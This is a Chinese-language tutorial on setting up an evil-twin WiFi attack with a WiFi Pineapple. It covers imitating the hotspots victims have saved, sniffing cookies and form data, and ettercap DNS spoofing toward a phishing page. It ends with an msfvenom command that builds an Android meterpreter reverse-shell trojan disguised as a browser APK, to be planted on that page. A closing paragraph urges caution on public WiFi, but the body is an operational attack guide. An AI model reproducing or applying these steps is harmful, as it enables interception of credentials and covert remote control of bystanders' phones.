使用 WifiPineApple 进行范围内 局域网钓鱼
声明:
仅供参考,勿用于非法用途,否则后果自负,与作者无关。
准备工作:
WifiPineApple,可以在上买一个汉化的。
两张无线网卡(支持监听模式的功能),推荐 RT3070L,便宜一些;如果有更大需求,可以买功率大一些的。
一个 USB 集线器,因为 PineApple 上只有一个 USB 接口。
KALI Linux 渗透操作系统。
在进入正题之前,我们需要了解一下 WiFiPineApple 这个设备:
在 WifiPineApple 下有这么一个功能:PineAP,它的功能可谓是强大:可以自动模拟手机曾经连接过的热点,也就是通过手机内的 /data/misc/wifi/wpa_supplicant.conf(存放手机记录的热点名称以及密码)文件,来创建 WiFi 热点的名称,它创建带密码 / 不带密码的 2 种,从而导致,附近的其他用户只要开启了 WiFi,就会自动连接到你的 PineApple 上。
下边说明实验的步骤:
0x01 连接 PineApple:
打开 PineApple,在设备的侧面有一个按钮,推到左侧是开启,右侧是充电宝模式,中间是关机。
插入网线或连接建立的热点(一般开机后需要等待 2 分钟左右),使用 web 的方式登陆 PineApple 的默认连接的地址为:http://172.16.42.1:1471
输入账号密码登陆(厂商提供默认口令)
我们看到以下的界面:
0x02 配置网络(重点):
在左侧的菜单栏中选择网络
在网络中我们可以看到当前网卡和 IP 地址获取的情况
我们需要做的配置是:一块网卡用于建立 PineAP 热点,一块网卡用于桥接其他网络,连接外网。还有一块网卡用于连接设备物理接口,和默认建立的 wifi (不能动)
最终达到这样的效果
0x03 进行一些嗅探和欺骗
PineApple 中有很多的插件,都可以进行对连接上的客户机,做一些 “手脚”,例如图片网址获取的功能,他可以获取到用户访问未被 SSL 加密的图片和一些网址的 URL、请求时提交的数据和 cookie 等。
当然,这些功能在 KALI 内手动进行实现,但是通过这个 web 的方式一键搭建,是不是很方便呢?
0x04 通过 KALI 来手动进行 dns 劫持,并且伪造钓鱼网页
启动 KALI Linux 虚拟机,并设置桥接网卡 我拿自己的有线网卡为例子
菜单栏下的编辑 -> 虚拟网络编辑器,选择使用桥接网卡,并桥接到自己的物理设备 (连接 PineApple 的设备)
配置 ip 地址,或者等待 dhcp 自动分配
可以 ping 通设备后,我们搭建一个 web 服务器 : service apache2 start
将钓鱼页面放置 /var/www/html 目录下
接下来,我们启动 ettercap 来进行 dns 欺骗 :
配置 ettercap 文件:
Vim /etc/Ettercap/etter.dns
修改为所有的域名都指向 也就是 KALI 的地址
启动 ettercap Ettercap -G
Ctrl+U 启动 网卡选择桥接到 PineApple 的网卡
管理插件,并将 dns 欺骗功能启用
这时用户访问的未加密的一些网页就会变成你的钓鱼页面,为了测试,做了一个简单的网页,
当然,如果想要更好的效果的话,可以找一个真实性更好的网页进行测试。
0x05 通过 msf 生成木马,远控手机或 PC。
msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=5555 > ~/360浏览器.apk
放在钓鱼页面上,等待用户 “上钩”.
具体的用法可以参考
附上我的几个成功的例子(在被允许的情况下)
当然,不止有这些功能,有什么好的想法都可以去尝试一下,不过要适度哦。
0x00 结语
引用我说说里说的话:没有什么是绝对安全的,连接即使是曾经连接过的 wifi 和确定之前连接是安全的 wifi 也是及其危险的,当攻击者伪造出你认为可靠的热点时,你连接了他,可能是主动去连接,也可能是被动去连接 (wifi 一直打开),就会造成信息的泄露,可能会透露你的个人信息:即使现在网络采用了 SSL 技术进行了加密传输,但是还是有相当一部分没有实现这项功能,所以,例如 QQ 号,还有网络浏览的一些信息以及照片,都可能被泄露,不重视网络安全,为了谋取一些利益的同时,忽视手机警告提示,甚至造成更严重的后果!!例如:下载未知绑定了木马的 app 可以被攻击者利用获取短信信息 (验证码)、联系人 (诈骗),甚至摄像头 (威胁),所以要提高安全意识,不要在公共场合轻易的连接 wifi,即使是你认为可靠的。